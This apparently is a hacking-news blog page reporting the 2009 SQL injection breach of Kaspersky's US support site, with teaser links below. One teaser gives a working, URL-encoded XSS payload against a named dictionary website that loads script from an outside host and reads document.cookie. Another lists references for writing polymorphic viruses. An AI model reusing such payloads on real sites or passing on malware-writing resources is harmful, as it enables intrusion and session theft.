Hard to digest, but true. The leading anti-virus website provider Kaspersky’s support website got hacked and details are published at this blog.

Kasperksy admitted that it’s their fault and blamed an ‘external’ developer for the vulnerable code. Though it’s unlikely that the developer intentionally created the vulnerable code, but it slipped the normal review process of kasperksy.

Kaspersky became aware of the situation after being informed by one of its employee about the data breach. Though SQL injection method, hacker was able to hack the support website and posted so many screenshots of the support page. Hackers listed all the table names, but didn’t post any personal information from the database.

“They could have gotten access to some data that was stored on our servers, including 2500 email addresses of customers who signed up for a product trial and 25,000 activation codes belonging to our products but that didn’t contain personal customer references. The vulnerability found on usa.kaspersky.com did not affect any other Kaspersky Lab Internet resources, including www.kaspersky.com, the official website of the company’s headquarters”. – Kaspersky

Screenshot and other hacking details here:

http://hackersblog.org/2009/02/07/usakasperskycom-hacked-full-database-acces-sql-injection/

Explore More

[Tut/Sources] References to poly/meta/permutation

Articles: Polymorphic engines – Trigger – SLAM #4 Code: http://vx.netlux.org/lib/static/vdat/tupoleng.htm Polymorphism ant Intel instruction format – LiTlLe VxW – 29A #7 Code: http://vx.netlux.org/29a/29a-7/Articles/29A-7.027 Guide to improving Polymorphic Engines – Rogue

Read More

critical XSS Vulnerability on Ayar Myanmar-English Dictionary

PlanetCreator has reported another critical XSS Vulnerability on Ayar Myanmar – English Dictionary Website :    Owned by Ayar Myanmar Unicode Group. Test XSS : http://myanmardictionary.co.cc/feedback.php?page=1&q=%27%22%3E%3C%2Ftitle%3E%3Cscript%20src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js%3Ealert%28document.cookie%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+PlanetCreator%3C%2Fh1%3E%3C%2Fmarquee%3E This vulnerability has been alerted

Read More

Critical SQL Injection in Myanmar Teleport – Myanmar Internet Service Provider (formerly known as BaganNet)

PlanetCreator has reported another critical SQL Injection (vulnerability) on Myanmar Teleport – Myanmar Internet Service Provider (formerly known as BaganNet) http://www.myantel.net.mm/ SQL injection is a code injection technique that exploits

Read More